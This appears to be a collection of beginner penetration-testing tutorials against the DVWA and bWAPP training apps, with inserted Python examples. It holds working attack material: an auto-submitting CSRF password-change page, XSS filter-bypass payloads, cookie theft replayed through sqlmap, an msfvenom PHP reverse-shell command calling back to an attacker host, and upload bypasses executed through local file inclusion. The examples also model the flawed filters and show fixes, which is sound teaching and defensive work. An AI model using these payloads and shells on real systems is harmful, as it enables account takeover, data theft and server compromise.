CSRF Tutorial for Beginners in DVWA

In this article you will learn about the cross-site request forgery (CSRF) attack. For this CSRF tutorial I have targeted DVWA and tried to bypass the low security level.

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user’s browser.

An attacker may forge a request to log the victim into a target website using the attacker’s credentials; this is known as login CSRF. Login CSRF makes various novel attacks possible; for instance, an attacker can later log into the site with his legitimate credentials and view private information.

Reference: en.wikipedia.org/wiki/Cross-site_request_forgery

Let's start!!!

By default the credentials for DVWA are admin:password. As you can see, I have used them to log in to DVWA.

Now set the security level to low and select Cross Site Request Forgery as the current vulnerability. Here you see that text fields are provided for changing the password of the user admin.

Now open the view-source page and copy the highlighted text (the HTML of the password-change form).

Then paste the copied HTML code into a text file. If you are familiar with HTML, the following syntax inside Notepad will be easy to understand: it creates a form that resets the password of the web page. Now save the file as csrf.html.

When you open csrf.html it will look like the image below: it contains the text fields for the password and a submit button.

Now open csrf.html in Notepad again and edit the value attribute of the text fields for the new password and the confirm password. In the following screenshot you can see I have set value="hacker" for both the new password and the confirm password. Save it again as csrf.html.

When you open csrf.html again you will find that the previously blank password fields are now pre-filled.

When you click the Change button the password is reset on that web page. This is how an HTML form works, and in the given screenshot you can read the GET request that changes the password through the URL. DVWA's low level accepts the password change as a plain GET request with no anti-CSRF token, which is what makes it easy to forge.

Since this tutorial is about bypassing low security in DVWA, we need to add the target location inside the HTML form, so that a CSRF attack can change the admin password without the admin's consent.

Now copy the URL as shown in the following image.

Open csrf.html in Notepad again and replace the # in the form's action attribute with the copied URL, so that the form submits directly to the target and changes the password of the user admin.

Here you can read the final syntax of the HTML form that changes the admin password in DVWA without the admin's involvement. Now send this csrf.html file to the victim using a social engineering or phishing technique. The attack only works if the victim is logged in to DVWA in the same browser when the form is submitted, because the browser attaches the victim's session cookie to the forged request.

When the victim opens csrf.html and clicks the Change button, the admin password in DVWA is changed.
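The procedure above as one script, added here as an example that is not part of the original article: it generates the csrf.html page (with an onload handler, so the victim does not even have to click Change) and, on the defending side, the per-session token check that DVWA's higher levels use to stop the attack. The host 192.168.1.8, the new password and the user_token field name are assumptions.

```python
"""Added example, not from the original article: build csrf.html for DVWA's
low-level password change and show the server-side token check that stops it.
Host, password and the user_token field name are assumptions."""
import hmac
import html
import secrets
from urllib.parse import urlencode

TARGET = "http://192.168.1.8/dvwa/vulnerabilities/csrf/"   # assumed DVWA host


def change_params(new_password):
    # The three parameters the legitimate DVWA form sends.
    return {"password_new": new_password, "password_conf": new_password, "Change": "Change"}


def csrf_url(target, new_password):
    """The GET request the article reads from the URL bar; a single <img src>
    pointing here would already be enough to fire it."""
    return target + "?" + urlencode(change_params(new_password))


def csrf_poc(target, new_password):
    """A copy of the form with action set to the target and the password values
    pre-filled, plus an onload handler so it submits without a click."""
    fields = "\n".join(
        f'  <input type="hidden" name="{html.escape(k)}" value="{html.escape(v)}">'
        for k, v in change_params(new_password).items()
    )
    return (
        '<html><body onload="document.forms[0].submit()">\n'
        f'<form action="{html.escape(target)}" method="GET">\n'
        f"{fields}\n"
        '  <input type="submit" value="Change">\n'
        "</form></body></html>"
    )


# ---- defending side (the handler as it should be written) -----------------

def issue_token(session):
    """Mint a random token, keep it in the session and embed it in the real
    form. A page on another origin cannot read the victim's session or the
    form, so it cannot supply the token."""
    session["csrf_token"] = secrets.token_hex(16)
    return session["csrf_token"]


def change_password(session, params):
    """Reject unless the request carries the session's token (constant-time
    compare) and both password fields agree. Returns True on success."""
    expected = session.get("csrf_token", "")
    if not expected or not hmac.compare_digest(params.get("user_token", ""), expected):
        return False
    if params.get("password_new") != params.get("password_conf"):
        return False
    session["password"] = params["password_new"]
    return True


if __name__ == "__main__":
    print(csrf_url(TARGET, "hacker"))
    print(csrf_poc(TARGET, "hacker"))
```

Open the generated page in a browser that holds a live DVWA admin session and the password changes with no click. Note that the GET-based change is a second defect: a SameSite=Lax session cookie would still be sent on this top-level GET navigation, so state changes should require POST in addition to the token.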

From the screenshot you can see that we have changed the admin's password without permission.

Now let's verify. We know the previous credentials were admin:password; when I try to use them, the login fails.

When I try admin:hacker as the current credentials, I log in to DVWA successfully. This was all about the CSRF tutorial for bypassing low security in DVWA.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles and an Information Security Consultant.

XSS Exploitation in DVWA (Bypass All Security)

In the previous tutorial I discussed the cross-site scripting attack, looked at the damage it can cause and briefly explained the types of XSS vulnerability. In this tutorial you will learn how to bypass both types of XSS (stored and reflected) at all three security levels, if the web application is suffering from it.

Reflected Cross Site Scripting

Set security low

Open the localhost IP in the browser, log in with admin:password and select Reflected Cross Site Scripting from the list of vulnerabilities.

Now have a look at a small script that generates an alert window. I will inject the script through the text field provided for "name".

<script>alert("helllooo")</script>

The browser executes our script, which generates an alert prompt as shown in the following screenshot.

At low security the "name" parameter is reflected into the page without any filtering or encoding, so the injected script runs exactly as typed; the only constraint the developer imposes is that the field must not be left empty.

Set Security Medium

At medium security, if you view the source of the page you will find that the highlighted code adds a layer of filtering to the input from the "name" field: it looks for the <script> tag in order to disable the JavaScript.

str_replace — Replace all occurrences of the search string with the replacement string. If an attacker injects a payload using the literal <script> tag, that tag is removed (replaced with an empty string), so the remaining text no longer executes.

The check is case sensitive: the PHP code looks for the exact string <script>, so it can be bypassed with <SCRIPT>, or by using another HTML element with an event handler instead of a script tag.

So there are two ways: use the <SCRIPT> tag, or any other HTML element. Here I have used the body tag to inject the payload.

<body onload=alert("XSS")>

The above payload is injected successfully and we have bypassed medium security. You can see from the screenshot that the XSS prompt opens via the body tag.

Set Security High

At high security the level of filtering increases: you will find that the preg_replace PHP function is used to apply a regular expression that disables the JavaScript.

preg_replace – Searches a string for matches to a pattern and replaces them with the replacement.

The above technique now fails: the regular expression matches the word "script" case-insensitively, even with other characters inserted between its letters, and removes the match, so <script>, <SCRIPT> and obfuscated variants of the tag are all stripped. It is still a blacklist, though: it only looks for script tags, not for other elements that can carry JavaScript.

To bypass high security, use a different HTML element. As you can see, I have used an image tag whose onerror handler runs the JavaScript when the (non-existent) image fails to load.

<img src=x onError=alert('xss')>

In the screenshot below you can see the XSS alert prompt.

CONGRATS!!! We have successfully bypassed all three security levels.
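To make the medium and high bypasses above concrete, here is an added example (not from the article and not DVWA's own source) that models the three reflected-XSS filters in Python, runs the article's four payloads through them, and shows the fix: encoding the output for the HTML context instead of blacklisting tags. The str_replace and preg_replace patterns are reconstructed from memory of DVWA 1.9 and are assumptions; check them against the view-source of your own copy. The still_executes() check is a rough heuristic for the demonstration, not a complete XSS detector.

```python
"""Added example: Python models of DVWA's reflected XSS filters (assumed
patterns) and the article's payloads run against them."""
import html
import re


def filter_low(name):
    # Low: the value is echoed back untouched.
    return name


def filter_medium(name):
    # Medium, assumed: str_replace('<script>', '', $name)
    # exact match, case-sensitive, so <SCRIPT> and other tags survive.
    return name.replace("<script>", "")


def filter_high(name):
    # High, assumed: preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name)
    # kills any case of "script" after a "<", but nothing else.
    return re.sub(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", "", name, flags=re.IGNORECASE)


def filter_fixed(name):
    # The fix: htmlspecialchars()-style encoding of every special character,
    # so the browser renders the payload as text instead of markup.
    return html.escape(name, quote=True)


SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)
EVENT_HANDLER = re.compile(r"<\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def still_executes(output):
    """Heuristic: does the reflected output still contain an opening script
    tag or an element carrying an on* event handler?"""
    return bool(SCRIPT_TAG.search(output) or EVENT_HANDLER.search(output))


# The four payloads used in the article.
PAYLOADS = {
    "lower script": '<script>alert("helllooo")</script>',
    "upper script": '<SCRIPT>alert("XSS")</SCRIPT>',
    "body onload": '<body onload=alert("XSS")>',
    "img onerror": "<img src=x onError=alert('xss')>",
}


def evaluate(filter_fn):
    """Map each payload label to whether it survives the given filter."""
    return {label: still_executes(filter_fn(p)) for label, p in PAYLOADS.items()}


if __name__ == "__main__":
    for fn in (filter_low, filter_medium, filter_high, filter_fixed):
        print(f"{fn.__name__:14s} {evaluate(fn)}")
```

The run shows the article's ladder: medium strips only the lowercase tag, high strips every spelling of the tag but none of the event-handler payloads, and the encoded version lets nothing through. The lesson for the developer is that blacklisting tag names never ends; contextual output encoding does.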

Stored Cross Site Scripting

Set security low

Now have a look at a small script that generates an alert window. I will inject the script through the text area provided for the message, where it is stored on the server.

<script>alert("helllooo")</script>

Now when a user visits this page to read our message, their browser executes our script, which generates an alert prompt as shown in the following screenshot.

Since the payload is stored permanently in the web application's database, you need to reset the database before switching to the other two security levels; otherwise the stored payload keeps firing regardless of the level.

Set Security Medium

If you remember, in the previous article we used Inspect Element to change the maximum length of the message text area so that we could fit our script into it. Repeat the same process to change the maximum length of the "name" text field, because at medium level it is the name field that is filtered only for the literal <script> tag.

Change maxlength="10" to maxlength="100", which gives enough room to inject the payload. This limit is enforced only by the browser, so it is not a security control; any proxy or a hand-made request bypasses it just as easily.

Now type the following content into the "name" text field.

<body onload=alert("XSS")>

Remember not to leave the message box empty.

Now when a user visits this page to read our message, their browser executes our script, which generates an alert prompt as shown in the following screenshot.

Again you need to reset the database.

Set security High

Repeat the same process to change the maximum length of the "name" text field.

Change maxlength="10" to maxlength="100".

Now type the following content into the "name" text field.

<img src=x onError=alert('xss')>

Remember not to leave the message box empty.

CONGRATS!!! We have successfully bypassed all three security levels.


Stored XSS Exploitation in DVWA (Beginner Guide)

This article is written to raise awareness among security researchers and developers of the level of damage an XSS attack can cause if the web application is suffering from a cross-site scripting vulnerability.

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. 

Stored XSS (Persistent or Type I)

Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser. With the advent of HTML5, and other browser technologies, we can envision the attack payload being permanently stored in the victim’s browser, such as an HTML5 database, and never being sent to the server at all.

Reference: owasp.org

Let's start!!!

Attacker: Kali Linux

Target: DVWA

For this tutorial I have targeted DVWA. Open the localhost IP in the browser, log in with admin:password and select the Stored Cross Site Scripting vulnerability from the list.

Now have a look at a small script that generates an alert window. I will inject the script through the text area provided for the message, where it is stored on the server.

<script>alert("XSS")</script>


Now when a user visits this page to read our message, their browser executes our script, which generates an alert prompt as shown in the following screenshot.

This was a small demo of how to inject a script if the server is suffering from XSS. Next you will learn what else an attacker can do to cause damage to the web application.

If the attacker knows that the web server has XSS, he may try to steal the cookies, which contain the session ID, so he will craft a script that reads the current cookies.

In the following screenshot you can see I have injected the script to read the page's cookies.

<script>alert(document.cookie)</script>

In the image below you can see that when the script executed it displayed the browser's cookies for this site; in a real attack the payload would send them to a server the attacker controls rather than show them in an alert. I will now use these cookies to retrieve data from the web application's database. This only works because the PHPSESSID cookie is readable by JavaScript; if it carried the HttpOnly flag, document.cookie would not expose it.
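As an added example (not from the original article), the following Python models what alert(document.cookie) can see and audits Set-Cookie headers for the attributes that would have made the theft, and the CSRF from the first tutorial, harder. The header lines are constructed for the example; only the PHPSESSID value is taken from the article.

```python
"""Added example: which cookies a stored-XSS payload can read, and an audit of
Set-Cookie headers for HttpOnly / Secure / SameSite. Headers are constructed."""


def parse_set_cookie(header_value):
    """Split one Set-Cookie header into (name, value, {attribute: value}).
    Flag attributes without a value (Secure, HttpOnly) map to True."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value, attrs


def visible_to_script(headers):
    """What document.cookie returns for this origin: every cookie that was set
    without HttpOnly, joined the way the browser joins them."""
    visible = []
    for header in headers:
        name, value, attrs = parse_set_cookie(header)
        if "httponly" not in attrs:
            visible.append(f"{name}={value}")
    return "; ".join(visible)


def audit_cookie(header_value):
    """Return (cookie name, list of findings) for one Set-Cookie header."""
    name, _, attrs = parse_set_cookie(header_value)
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable via document.cookie, so XSS can steal it")
    if "secure" not in attrs:
        findings.append("missing Secure: also sent over plain HTTP")
    if str(attrs.get("samesite", "")).lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: cookie rides along on cross-site requests")
    return name, findings


# Constructed sample: the two cookies the article's sqlmap command replays,
# plus one set with the flags a hardened application would use.
SAMPLE_HEADERS = [
    "PHPSESSID=r12pk67cuq3s7eo4iktb88sud2; path=/",
    "security=low; path=/dvwa/",
    "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
]

if __name__ == "__main__":
    print("document.cookie ->", visible_to_script(SAMPLE_HEADERS))
    for header in SAMPLE_HEADERS:
        print(audit_cookie(header))
```

The first line of output is exactly the string the article's alert(document.cookie) payload displays and the sqlmap command reuses; the hardened third cookie never reaches the script. HttpOnly does not fix the XSS itself (the payload can still act in the victim's browser), but it removes the easiest way to carry the session elsewhere.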

SQL Injection with XSS

It is quite possible that the web application has more than one vulnerability. Suppose it also has a SQL injection vulnerability; then it becomes very easy for the attacker to retrieve data from the database using the stolen session cookie, because sqlmap can send that cookie with every request and is treated as the logged-in admin.

For example, in DVWA I switch from XSS to SQL Injection; now copy its URL with user ID=1.

From the above we have the browser cookie and the target URL for the SQL injection attack. Now open a terminal in Kali Linux and use the cookie and the URL in the sqlmap command, as shown in the screenshot.

sqlmap -u "http://192.168.1.8/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=r12pk67cuq3s7eo4iktb88sud2" --dbs --batch

As you can see, it has enumerated all the database names present on the database server.

Gaining Shell Access with XSS

Now suppose the server suffers from both XSS and a file upload vulnerability; in this case, how can an attacker harm the web application server?

First let's prepare the malicious PHP file to upload to the web server. As usual we use msfvenom for this purpose and save the generated PHP code as shell.php.

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=4444 -f raw -o shell.php

Then I switched to the File Upload vulnerability in DVWA to upload shell.php. From the screenshot you can see that shell.php was uploaded successfully; now copy the highlighted path.

Start the multi/handler inside the Metasploit framework, with the same payload, LHOST and LPORT as the msfvenom command.

Here the text area for the message is not long enough for our next script, so right-click the page and select Inspect Element to view the maximum length set for the text area.

Here you can see the message length for the text area is set to "50".

Change the maximum length from "50" to "500" so that the next script fits.

In the following screenshot you can see I have injected a script containing the path of the uploaded file, which is saved on the server. When a user opens the page to read the message, their browser is redirected to shell.php; the web server then executes our PHP backdoor, which makes a reverse connection to the attacker machine.

<script>window.location="http://192.168.1.8/dvwa/hackable/upload/shell.php"</script>

Here you can see that as soon as the script executed, a meterpreter session opened. Note that the session runs on the web server that executed shell.php, under the web server's user account, not on the PC of the user who read the message; that user's browser only triggered the request.

meterpreter > sysinfo


File Upload Exploitation in bWAPP (Bypass All Security)

In this article you will learn how to bypass all three security levels of Unrestricted File Upload in bWAPP. If you want to know more about the various kinds of file upload vulnerability, read the previous article; it may help you understand this one more clearly.

LOW SECURITY

Open the target IP in the browser: 192.168.0.106/bWAPP/login.php. Enter bee and bug as the user and password respectively.

Set the security level to low, choose Unrestricted File Upload from the "Choose your bug" list box and click Hack.

Create a PHP backdoor using msfvenom and start a multi/handler in the background; from the screenshot you can see I have browsed to meter.php to upload it in place of an image.

When the image is uploaded successfully, the web server returns a link to the directory where the image is saved so you can view it. Since we have not uploaded a real image, we execute our PHP backdoor by clicking the link "here".

When the link "here" is clicked, we receive a reverse connection from the server as a meterpreter session inside the Metasploit framework.

From the screenshot you can see that Metasploit session 1 is opened.

MEDIUM SECURITY

As the security level has changed, the same procedure as above no longer works. However, you only need to change the extension of your PHP backdoor to bypass medium security: the check is a blacklist of extensions, .php3 is not on it, and the server still hands .php3 files to the PHP interpreter. In the image below you can see I have browsed to meter.php3 for uploading.

Now repeat the same steps: run the multi/handler in the background and click the link "here" to receive a meterpreter session.

GREAT!!! From the screenshot you can see Metasploit session 2 is opened.

HIGH SECURITY

Now we enter high security, where both of the above file upload attacks fail, so again you need to make a small change to the extension of the PHP backdoor file to upload it to the web server.

From the screenshot you can read the file name high.php.png, which I have browsed to for uploading. The high level only accepts image extensions, so the file is accepted; the web server, however, will not execute a .png file as PHP on its own.

Our file is uploaded successfully; now right-click the link "here" to copy the link location, and keep the multi/handler running in the background.

To bypass the high security level of file upload in bWAPP we need to switch both the bug and the security level.

Set the security level to low and choose the bug Remote & Local File Inclusion, then click Hack.

The requested web page, which suffers from RFI and LFI vulnerabilities, opens. It asks you to select a language from the drop-down list, and when you click Go the selected language file name is included in the URL.

I uploaded the PHP backdoor at high security but execute it through the low-security LFI vulnerability: PHP's include() runs the PHP code inside whatever file it is given, regardless of the file's extension, so the .png extension that satisfied the upload check is no protection here. Now manipulate the URL as shown in the screenshot:

http://192.168.0.106/bWAPP/rlfi.php?language=lang_en.php&action=go
becomes
http://192.168.0.106/bWAPP/rlfi.php?language=images/high.php.png

When the above URL is opened in the browser you will get a reverse connection from the server inside Metasploit.

Congrats!!! From the screenshot you can see Metasploit session 3 is opened.

Hence we have bypassed all three security levels of file upload in bWAPP.
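The three checks just bypassed, and the LFI step that turns an "image" into code, as an added Python model (not bWAPP's code) alongside a hardened upload handler. The blacklist and whitelist contents, the language-file set and the directory names are assumptions chosen to reproduce the behaviour the article observed (meter.php blocked at medium, meter.php3 accepted, high.php.png accepted at high).

```python
"""Added example: models of the bWAPP upload checks described in the article,
the include() step that executes a whitelisted 'image', and a safer handler.
Lists and paths are assumptions for illustration."""
import os
import secrets

BLACKLIST = {".php", ".phtml", ".asp", ".aspx", ".jsp"}   # assumed medium-level list
IMAGE_WHITELIST = {".jpg", ".jpeg", ".png", ".gif"}       # assumed high-level list
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
LANGUAGE_FILES = {"lang_en.php", "lang_fr.php"}            # assumed rlfi.php menu


def last_extension(filename):
    """Only the final extension counts: 'high.php.png' -> '.png'."""
    return os.path.splitext(os.path.basename(filename))[1].lower()


def upload_allowed_low(filename):
    return True                                 # no check at all


def upload_allowed_medium(filename):
    # Blacklist: anything not listed slips through (.php3, .phar, ...), and the
    # web server may still hand such files to the PHP interpreter.
    return last_extension(filename) not in BLACKLIST


def upload_allowed_high(filename):
    # Whitelist on the last extension only: high.php.png passes and the web
    # server serves it as a static image rather than executing it ...
    return last_extension(filename) in IMAGE_WHITELIST


def lfi_include(language):
    # ... until rlfi.php?language=<path> hands it to include(), which runs any
    # <?php ?> block in the file whatever its name. Returns the path that would
    # be included, to make the missing validation visible.
    return "bWAPP/" + language


def safe_include(language):
    # Hardened: the parameter selects from a fixed set; no path is built from it.
    return "bWAPP/" + language if language in LANGUAGE_FILES else None


def safe_store(filename, data, upload_dir="uploads"):
    """Hardened upload: whitelist the last extension, require the content to
    match it (PNG signature shown), refuse embedded PHP, and store under a
    random name so the client never controls the path. Returns the stored
    path or None."""
    ext = last_extension(filename)
    if ext not in IMAGE_WHITELIST:
        return None
    if ext == ".png" and not data.startswith(PNG_MAGIC):
        return None
    if b"<?php" in data or b"<?=" in data:
        return None
    return os.path.join(upload_dir, secrets.token_hex(8) + ext)


if __name__ == "__main__":
    for name in ("meter.php", "meter.php3", "high.php.png"):
        print(name, upload_allowed_medium(name), upload_allowed_high(name))
    print(lfi_include("images/high.php.png"), safe_include("images/high.php.png"))
```

Even the hardened handler is only half the fix: the upload directory must also be configured so the web server never executes anything in it, and the include() bug must be closed separately, because the article's high-level bypass never relied on the upload check being wrong.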

